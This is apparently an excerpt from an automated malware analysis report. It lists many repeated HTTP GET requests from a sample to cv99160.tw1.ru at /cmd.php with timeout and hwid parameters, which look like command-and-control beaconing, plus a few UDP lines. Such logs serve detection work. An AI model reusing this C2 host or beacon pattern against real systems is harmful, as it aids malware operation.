                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
